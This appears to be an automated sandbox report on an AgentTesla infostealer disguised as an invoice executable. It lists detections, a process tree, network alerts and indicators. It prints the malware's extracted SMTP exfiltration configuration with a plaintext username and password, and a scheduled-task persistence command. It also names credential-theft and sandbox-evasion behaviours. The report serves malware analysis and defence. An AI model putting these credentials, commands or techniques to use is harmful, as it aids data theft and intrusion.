
Windows Analysis Report
INVOICE OUTSTANDING.exe

Overview

General Information

Sample Name:INVOICE OUTSTANDING.exe
Analysis ID:680571
MD5:0fa9d94d6393235f67a17b220902dbfa
SHA1:3c0ae56ab072f622da13806b4336f01f7137ee4c
SHA256:65ea111f533e1283b202b87434ea207410c1680eadc9b2193c76179eb87decfc
Tags:agentteslaexe

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected AntiVM3
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
.NET source code contains very large strings
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • INVOICE OUTSTANDING.exe (PID: 5128 cmdline: "C:\Users\user\Desktop\INVOICE OUTSTANDING.exe" MD5: 0FA9D94D6393235F67A17B220902DBFA)
    • BackgroundTransferHost.exe (PID: 5816 cmdline: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1 MD5: 02BA81746B929ECC9DB6665589B68335)
    • schtasks.exe (PID: 5816 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ahgeNfsrA" /XML "C:\Users\user\AppData\Local\Temp\tmp69D2.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 1428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegSvcs.exe (PID: 5364 cmdline: {path} MD5: 2867A3817C9245F7CF518524DFD18F28)
  • kECjS.exe (PID: 5912 cmdline: "C:\Users\user\AppData\Roaming\kECjS\kECjS.exe" MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 3168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • kECjS.exe (PID: 2756 cmdline: "C:\Users\user\AppData\Roaming\kECjS\kECjS.exe" MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"Exfil Mode": "SMTP", "Username": "import@oceanskylogistics.in", "Password": "OcE@n@123$", "Host": "mail.oceanskylogistics.in"}
Source | Rule | Description | Author
00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_AgentTesla_d3ac2b2f | unknown | unknown
00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_AgentTesla_e577e17e | unknown | unknown
      • 0x70445:$a: 20 4D 27 00 00 33 DB 19 0B 00 07 17 FE 01 2C 02 18 0B 00 07
      • 0xa4265:$a: 20 4D 27 00 00 33 DB 19 0B 00 07 17 FE 01 2C 02 18 0B 00 07
0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(12 further entries not shown)
Source | Rule | Description | Author
14.0.RegSvcs.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
14.0.RegSvcs.exe.400000.0.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
14.0.RegSvcs.exe.400000.0.unpack | MALWARE_Win_AgentTeslaV3 | AgentTeslaV3 infostealer payload | ditekSHen
14.0.RegSvcs.exe.400000.0.unpack | Windows_Trojan_AgentTesla_d3ac2b2f | unknown | unknown
14.0.RegSvcs.exe.400000.0.unpack | Windows_Trojan_AgentTesla_e577e17e | unknown | unknown
            • 0x829d:$a: 20 4D 27 00 00 33 DB 19 0B 00 07 17 FE 01 2C 02 18 0B 00 07
(10 further entries not shown)
            No Sigma rule has matched
Timestamp:08/08/22-20:20:11.732977
Source IP:192.168.2.3
Destination IP:43.255.154.57
Source Port:49763
Destination Port:587
SID:2839723
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:08/08/22-20:20:11.733160
Source IP:192.168.2.3
Destination IP:43.255.154.57
Source Port:49763
Destination Port:587
SID:2851779
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:08/08/22-20:20:11.733160
Source IP:192.168.2.3
Destination IP:43.255.154.57
Source Port:49763
Destination Port:587
SID:2840032
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:08/08/22-20:20:11.732977
Source IP:192.168.2.3
Destination IP:43.255.154.57
Source Port:49763
Destination Port:587
SID:2030171
Protocol:TCP
Classtype:A Network Trojan was detected



            AV Detection

Source: INVOICE OUTSTANDING.exe | ReversingLabs: Detection: 37%
Source: INVOICE OUTSTANDING.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\ahgeNfsrA.exe | Avira: detection malicious, Label: HEUR/AGEN.1235476
Source: C:\Users\user\AppData\Roaming\ahgeNfsrA.exe | ReversingLabs: Detection: 37%
Source: INVOICE OUTSTANDING.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\ahgeNfsrA.exe | Joe Sandbox ML: detected
Source: 14.0.RegSvcs.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "import@oceanskylogistics.in", "Password": "OcE@n@123$", "Host": "mail.oceanskylogistics.in"}
Source: INVOICE OUTSTANDING.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: INVOICE OUTSTANDING.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000E.00000003.362147300.00000000067C1000.00000004.00000800.00020000.00000000.sdmp, kECjS.exe, 00000012.00000000.364973573.0000000000992000.00000002.00000001.01000000.0000000C.sdmp, kECjS.exe.14.dr
            Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000E.00000003.362147300.00000000067C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.551379171.00000000067DD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000003.378901648.00000000067E7000.00000004.00000800.00020000.00000000.sdmp, kECjS.exe, 00000012.00000000.364973573.0000000000992000.00000002.00000001.01000000.0000000C.sdmp, kECjS.exe.14.dr
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h | 0_2_08324450
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h | 0_2_08324440

            Networking

Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49763 -> 43.255.154.57:587
Source: Traffic | Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49763 -> 43.255.154.57:587
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49763 -> 43.255.154.57:587
Source: Traffic | Snort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.3:49763 -> 43.255.154.57:587
Source: Joe Sandbox View | ASN Name: AS-26496-GO-DADDY-COM-LLCUS
Source: Joe Sandbox View | IP Address: 43.255.154.57
Source: global traffic | TCP traffic: 192.168.2.3:49763 -> 43.255.154.57:587
Source: unknown | DNS traffic detected: queries for: mail.oceanskylogistics.in

            Spam, unwanted Advertisements and Ransom Demands

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File written: C:\Windows\System32\drivers\etc\hosts

            System Summary

            Source: 14.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
            Source: 14.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 14.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_e577e17e Author: unknown
Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_e577e17e Author: unknown
Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_e577e17e Author: unknown
Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_e577e17e Author: unknown
Source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_e577e17e Author: unknown
Source: Process Memory Space: INVOICE OUTSTANDING.exe PID: 5128, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 5364, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: initial sample | Static PE information: Filename: INVOICE OUTSTANDING.exe
Source: 14.0.RegSvcs.exe.400000.0.unpack, <PrivateImplementationDetails>{B0E6175A-5157-4EA6-8358-F3F5E689E6E9}/CD42D637-B157-4DF1-910B-590510BF5A22.cs | Large array initialization: .cctor: array initializer size 11496
Source: INVOICE OUTSTANDING.exe, AddCompanyForm.cs | Long String: Length: 20037
Source: ahgeNfsrA.exe.0.dr, AddCompanyForm.cs | Long String: Length: 20037
Source: 0.0.INVOICE OUTSTANDING.exe.a30000.0.unpack, AddCompanyForm.cs | Long String: Length: 20037
Source: INVOICE OUTSTANDING.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 14.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 14.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 14.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_e577e17e reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 009cb27295a1aa0dde84d29ee49b8fa2e7a6cec75eccb7534fec3f5c89395a9d, id = e577e17e-5c42-4431-8c2d-0c1153128226, last_modified = 2022-04-12
Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_e577e17e reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 009cb27295a1aa0dde84d29ee49b8fa2e7a6cec75eccb7534fec3f5c89395a9d, id = e577e17e-5c42-4431-8c2d-0c1153128226, last_modified = 2022-04-12
Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_e577e17e reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 009cb27295a1aa0dde84d29ee49b8fa2e7a6cec75eccb7534fec3f5c89395a9d, id = e577e17e-5c42-4431-8c2d-0c1153128226, last_modified = 2022-04-12
Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_e577e17e reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 009cb27295a1aa0dde84d29ee49b8fa2e7a6cec75eccb7534fec3f5c89395a9d, id = e577e17e-5c42-4431-8c2d-0c1153128226, last_modified = 2022-04-12
Source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_e577e17e reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 009cb27295a1aa0dde84d29ee49b8fa2e7a6cec75eccb7534fec3f5c89395a9d, id = e577e17e-5c42-4431-8c2d-0c1153128226, last_modified = 2022-04-12
Source: Process Memory Space: INVOICE OUTSTANDING.exe PID: 5128, type: MEMORYSTR | Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, score = file, reference = Internal Research
Source: Process Memory Space: INVOICE OUTSTANDING.exe PID: 5128, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: RegSvcs.exe PID: 5364, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: INVOICE OUTSTANDING.exe, 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamexbHwaYRFftTggpxGZzIM.exe4 vs INVOICE OUTSTANDING.exe
Source: INVOICE OUTSTANDING.exe, 00000000.00000002.340774998.0000000003E19000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamektXC.exe6 vs INVOICE OUTSTANDING.exe
Source: INVOICE OUTSTANDING.exe, 00000000.00000002.333821911.0000000002E11000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameBunifu.UI.dll4 vs INVOICE OUTSTANDING.exe
Source: INVOICE OUTSTANDING.exe, 00000000.00000002.350083466.00000000077D0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMajorRevision.exe< vs INVOICE OUTSTANDING.exe
Source: INVOICE OUTSTANDING.exe, 00000000.00000003.295352536.00000000035D3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMajorRevision.exe< vs INVOICE OUTSTANDING.exe
Source: INVOICE OUTSTANDING.exe, 00000000.00000000.253277318.0000000000B00000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamektXC.exe6 vs INVOICE OUTSTANDING.exe
Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334218566.0000000002E75000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamexbHwaYRFftTggpxGZzIM.exe4 vs INVOICE OUTSTANDING.exe
Source: INVOICE OUTSTANDING.exe, 00000000.00000002.344196351.000000000479C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMajorRevision.exe< vs INVOICE OUTSTANDING.exe
Source: INVOICE OUTSTANDING.exe | Binary or memory string: OriginalFilenamektXC.exe6 vs INVOICE OUTSTANDING.exe
Source: INVOICE OUTSTANDING.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ahgeNfsrA.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe 43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
Source: INVOICE OUTSTANDING.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ahgeNfsrA.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: INVOICE OUTSTANDING.exe | ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | File read: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe "C:\Users\user\Desktop\INVOICE OUTSTANDING.exe"
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Process created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ahgeNfsrA" /XML "C:\Users\user\AppData\Local\Temp\tmp69D2.tmp
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
Source: unknown | Process created: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe "C:\Users\user\AppData\Roaming\kECjS\kECjS.exe"
Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | File created: C:\Users\user\AppData\Roaming\ahgeNfsrA.exe
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | File created: C:\Users\user\AppData\Local\Temp\tmp69D2.tmp
Source: classification engine | Classification label: mal100.troj.adwa.spyw.evad.winEXE@11/8@1/1
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: INVOICE OUTSTANDING.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Mutant created: \Sessions\1\BaseNamedObjects\RcVQRTaRQnykjShrHjGChRlqXGx
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1428:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3168:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:504:120:WilError_01
Source: INVOICE OUTSTANDING.exe | String found in binary or memory: Address:/AddressToolStripTextBox-AddressToolStripButton'ToolStripSeparator3'PhoneToolStripLabel
Source: 14.0.RegSvcs.exe.400000.0.unpack, A/F1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: INVOICE OUTSTANDING.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: INVOICE OUTSTANDING.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000E.00000003.362147300.00000000067C1000.00000004.00000800.00020000.00000000.sdmp, kECjS.exe, 00000012.00000000.364973573.0000000000992000.00000002.00000001.01000000.0000000C.sdmp, kECjS.exe.14.dr
Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000E.00000003.362147300.00000000067C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.551379171.00000000067DD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000003.378901648.00000000067E7000.00000004.00000800.00020000.00000000.sdmp, kECjS.exe, 00000012.00000000.364973573.0000000000992000.00000002.00000001.01000000.0000000C.sdmp, kECjS.exe.14.dr

Data Obfuscation

Source: INVOICE OUTSTANDING.exe, AddCompanyForm.cs | .Net Code: NewLateBinding.LateCall(dax, null, "Invoke", stackVariable4, null, null, stackVariable13, true)
Source: ahgeNfsrA.exe.0.dr, AddCompanyForm.cs | .Net Code: NewLateBinding.LateCall(dax, null, "Invoke", stackVariable4, null, null, stackVariable13, true)
Source: 0.0.INVOICE OUTSTANDING.exe.a30000.0.unpack, AddCompanyForm.cs | .Net Code: NewLateBinding.LateCall(dax, null, "Invoke", stackVariable4, null, null, stackVariable13, true)
Source: initial sample | Static PE information: section name: .text entropy: 7.770423052382821
